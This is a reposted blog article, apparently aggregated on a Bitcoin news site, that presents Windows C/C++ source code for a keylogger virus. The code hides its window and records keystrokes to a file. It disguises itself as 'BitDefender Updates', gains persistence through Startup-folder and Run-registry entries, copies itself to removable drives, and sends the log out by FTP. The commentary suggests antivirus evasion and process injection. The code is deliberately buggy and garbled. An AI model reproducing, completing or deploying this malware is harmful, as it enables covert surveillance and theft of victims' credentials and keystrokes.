C programming - Virus writing code
/*
FIRST VERSION
Ls Learn C Not 16 Bit,Windows C++ Before Reading On. Get The Win Help File For Reference
The First Function Is The Key Loggere Part(Pay Load) Which Simply Logs Key Strokes
Getkeypress(Int Keypress)
Getasynckeypressstate This Module Got The State Of Each Keys Which Is Passed Over To Our Function,The Int Ascii Value Of The Keys And Converted To Strings And Saved Ina File In C:\Sas.Txt
/*This Is Not A Good Method For Making The Key Kolggers But Preferably The First And Easy Option.Piping Out The Key Strokes Using The Key Bord Hooks Are The Best Method For Doing It(Google For It)
what it does
1)geting the handle to the windows created using hwnd
findwindowa("consolewindowclass",null);
2)registry entry valuse hkey
*********then the hide handle to hide the virus******************
3)using the handle obtained in "hide" we ill set it to be hiden so that itwill run in the back ground bt nt visible
getmodulefilename(getmodh,locate,sizeof(locate));
4)used to get the current path handle for moving it from current position to another
5)getmodulefilename
used to get the current system directory it differs on the insatllation of windows on diff drives
*********victims system file location***************
6)once after getting the system directory ex:c:\windows\system32
7)i append the path of virus copy c:\windows\system32 + bitdefenderupdates.exe using string cat function
8)now copy from current excuted path to new place using copyfile(locate,temprot,false);
copyfile(locate,"c:\\documents and settings\\all users\\start menu\\programs\\startup\\bitdefender_update.exe",false);
************breath of the virus*******************
9)setting it to get autoloaded ever time windows starts,we simply appendfewlines to the registry
10)it sends you the log keystrokes via mail usint ftp() function
we write two star up entryone a link to the current module and one to a fixed path so to evade from common anti virus detection
regsetvalueex(fixstup,"bit defender updates ",0,re_sz,(lpbyte)system2,sizeof(system2));
its ready
****************the wings and leg of virus*******************
am not including those part as its simple jsut write a text file with autorun entries to the removable drives and hence it ill be able to spread
and its ready
*****************************OTHER TECHNIQUES AND Improvements***********************
Just By Ading Few More Codes You Could Make It Un Detactable By Process Vivers And Task Managers
Just By Doing Few Researchs You Could Make It Un Detactable By Anti Virus
Insted Of The Direct Startup Entry Use A Parasitic Infection Technique To Get Auto Started
This Dont Check Whether A Removable Media Exsist Add A Function To Chek The Presence And Then Append The Virusu May Use Shchangenotifyregister To Get Notified Of Any New Drives
U Could All Make It As A Dll And Make Code It To Inject Inot Other Running Process For That Allu Neeed To Do Is To Get The List Of Process On Statup Create A Remote Thread And Inject It To The Stup Applications Virtual Memmory
Just Copy Paste And Compile Wont Work For For These Codes As I Have Added Lots Of Bugs In It.If You Really Wanna Make A Virus You May Try To Investigate And Correct Those Errors Else Leave It.I Don Encourage Script Kiddies
Ill Work Fine And Tested On Vc++,Blood Shed,And Boroland Cs
HAPPY HACKING
*\
#include <windows.h>
#include <Winuser.h>
#include <string>
#include <wininet.h>
#include <fstream.h>
string Getkeypress(int keypress)
{
string tempkeypress = "";
if (keypress == 8)
tempkeypress = "[delete]";
else if (keypress == 13)
tempkeypress = "\n"
else if (keypress == 32)
tempeypress = " "
else if (keypress == VK_PAUSE)
tempkeypress = "[PAUSE]";
else if (keypress == VK_CAPITAL)
tempkeypress = "[CAPITAL]";
else if (keypress == VK_SHIFT)
tempkeypress = "[SHIFT]";
else if (keypress == VK_TAB)
tempkeypress = "[TABULATOR]";
else if (keypress == VK_CONTROL)
tempkeypress = "[CTRL]";
else if (keypress == VK_ESCAPE)
tempkeypress = "[ESCAPE]";
else if (keypress == VK_END)
tempkeypress = "[END]";
else if (keypress == VK_HOME)
tempkeyress = "[HOME]";
else if (keypress == VK_LEFT)
tempkeypress = "[left]";
else if (keypress == VK_RIGHT)
tempkeypress = "[right]";
else if (keypress == VK_UP)
tempkeypress = "[UP]";
else if (keypress == VK_DOWN)
tempkeypress = "[DOWN]";
else if (keypress == VK_SNAPSHOT)
tempkeypress = "[SNAPSHOT]";
else if (keypress == VK_NUMLOCK)
tempkeypress = "[NUMLOCK]";
else if (keypress == 190 || keypress == 110)
tempkeypress = ".";
else if (keypress >=96 && keypress <= 105)
tempkypress = keypress-48;
else if (keypress > 47 && keypress < 60)
tempkeypress = keypress;
if (keypress != VK_LBUTTON || keypress != VK_RBUTTON)
{
if (keypress > 64 && keypress < 91)
{
if (GetkeypressState(VK_CAPITAL))
tempkeypress = keypress;
// Add code to check file size for trigering ftp file traansfer
if ((fp = open("c://sas.txt", O_RDONLY)) != -1)
fsize = filelength(fp);
if(fsize> 1000);//TRIGER THE FTP FILE TRANSFER WHEN FILE REACHES A FILE SIZE SPECIFY IN BYTES
//1MB = 1048576 bytes
int ftp();
else
{
keypress = keypress + 32;
tempkeypress = keypress;
}
}
}
return tempkeypress;
}
int ftp()
{
HINTERNET ftp=InternetOpen(TEXT("LOG UPLOAD"),INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if(!ftp)
return 0;
else
{
HINTERNET ftplogin=InternetConnect(Open,"ftp.myftp.com",21,
"usname","pwd",INTERNET_SERVICE_FTP,0,0);
BOOL log = FtpPutFile(ftplogin,loger,"log.txt",FTP_TRANSFER_TYPE_BINARY,0);//here u could use a file name based on date to avoid over writing
if (log==FALSE)
{
InternetCloseHandle(ftp);
InternetCloseHandle(ftplogin);
return 0;
}
return 1;
}
}
int main()
{
HWND hide;
long fsize;
char system[TOT_SIZ],system2[TOT_SIZ];
HKEY stup,fixstup;
TCHAR SIZ[TOT_SIZ];
LPVOID tempbuffer = NULL;
char temprot[TOT_SIZ];
BOOL buffera = TRUE, filesus = FALSE;
DWORD HANDLE fupldhandle = NULL;
TCHAR loger = TEXT("c\\sas.txt");
TCHAR FIXSTUPPATH[TOT_SIZ+12]="\\BitDefender Updates.exe";
DWORD fread = 0, favail = 0;
char LOCATE[TOT_SIZ];/*creating hide */
AllocConsole();
hide=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(hide,0);
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
GetModuleFileName(NULL,SIZ,TOT_SIZ);
GetSystemDirectory(system,sizeof(system));
GetSystemDirectory(system2,sizeof(system2));
//WRT 2SYS DRV AL PSBL DRV ONS
//temprot[0]=system[0];
//std::strcat(temprot,":\\Program Files\\BitDefender\\BitDefender Updates.exe");
std::strcat(system,"\\BitDefenderUpdates.exe");
//std::strcat(system2,"\\drveprotect.exe");
std::strcat(system2,FIXSTUPPATH);
CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,system,false);
CopyFile(LOCATE,system2,false);
CopyFile(LOCATE,"E:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"F:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"G:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"H:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"I:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"J:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);
CopyFile(LOCATE,"C:\\SAS\\BITDEFENDER_UPDATE.exe",false);
std::string Filename = "C:\\SAS.txt";
/*srt up*/
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&stup);
//st fix
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&fixstup);
//ste fst
RegSetValueEx(fixstup,
"BIT DEFENDER UPDATES ",
0,
RE_SZ,
(LPBYTE)system2,
sizeof(system2));
//stup fixed
RegSetValueEx(stup,
"BIT DEFENDER UPDATES",
0,
REG_SZ,
(LPBYTE)SIZ,
sizeof(SIZ));
/* Close the keypress. */
RegClosekeypress(stup);
RegClosekeypress(fixstup);
std::string TempString =
Fstream FStream;
FStream.pen(Filename., std::fstream::out | std::fstream:);
//FStream.write(
while(1==1)
{
Sleep(3);
for(int i = 8; i < 191; i++)
{
if(GetAsynckeypressState(i)&1 ==1)
{
TempString = Getkeypress (i);
FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}
from BITCOIN NEWS https://ift.tt/2ITzsf5
via Bitcoin News Update
Monday, May 28, 2018
C programming - Virus writing code
Date - May 28, 2018
Bitcoin News
Share this
Related Articles :
Paling Dilihat
-
Three stories dominate this week’s initial coin offering (ICO) round up: It appears many ICO projects are reaching out to social media infl...
-
from BITCOIN NEWS http://bit.ly/2BAgGb6 via Bitcoin News Update
-
Google hacking master list Dan Morrill (Program Director CityU of Seattle) posted 11/14/2008 | Comments (2) This master list of Google Ha...